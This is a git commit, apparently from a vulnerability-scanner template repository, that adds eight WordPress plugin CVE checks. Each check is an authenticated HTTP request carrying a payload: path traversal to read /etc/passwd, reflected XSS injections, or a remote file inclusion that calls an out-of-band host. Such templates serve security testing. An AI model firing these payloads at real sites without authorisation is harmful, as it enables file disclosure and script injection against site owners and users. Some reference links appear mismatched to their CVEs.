add some wp plugins cves
parent
56160908f0
commit
f29d2b20df
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2020-35749
|
||||
|
||||
info:
|
||||
name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-35749
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24300
|
||||
|
||||
info:
|
||||
name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24300
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24300
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onmouseover=alert(1)"
|
||||
- "PickPlugins Product Slider"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24488
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Post Grid < 2.1.8 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24488
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><script>alert(1)</script>"
|
||||
- "Post Grid Settings"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24926
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Domain Check < 1.0.17 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24926
|
||||
classification:
|
||||
cve-id: CVE-2021-24926
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
- "Domain Check"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-24947
|
||||
|
||||
info:
|
||||
name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
|
||||
classification:
|
||||
cve-id: CVE-2021-24947
|
||||
cwe-id: CWE-23
|
||||
tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24991
|
||||
|
||||
info:
|
||||
name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
cve-id: CVE-2021-24991
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
|
||||
- "WooCommerce PDF Invoices"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-25008
|
||||
|
||||
info:
|
||||
name: The Code Snippets WordPress plugin < 2.14.3 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25008
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-25008
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
|
||||
- "Snippets"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2021-25052
|
||||
|
||||
info:
|
||||
name: he Button Generator WordPress plugin < 2.3.3 - RFI
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-25052
|
||||
cwe-id: CWE-352
|
||||
tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
Loading…
Reference in New Issue